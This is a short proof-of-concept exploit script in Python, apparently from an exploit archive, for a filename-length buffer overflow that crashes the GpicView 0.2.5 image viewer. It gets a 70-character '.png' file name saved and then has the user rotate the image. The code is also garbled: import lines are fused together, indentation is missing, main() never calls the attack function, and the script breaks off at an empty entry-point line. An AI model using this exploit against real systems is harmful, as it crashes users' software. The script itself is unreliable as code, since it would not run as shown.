# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
#Example: python POC.py [image-file]
from sysimport argv
from subprocess import Popen
from shleximport split
from time import sleep
import shutil
def DOS(arg):
command= 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''#
command_2= split(command) #"""------------------------------------"""#
Popen(command_2)#"""Open file with Gpicview """#
print("Required: You have 15 seconds")
print("to click on preferences, and ")
print("check 'Auto Save Images' ")
buffer = 'A' * 70 + '.png'#"|"Rename image with Buffer"|"#
shutil.move(arg[1], buffer) #"""------------------------------------"""#
def main():
print("Author: David Silveiro ")
print("Company:Xino.co.uk ")
print(" POC Gpicview DOS")
print("File ready for overflow")
print("Now simply rotate the image")
if __name__ == "__main__":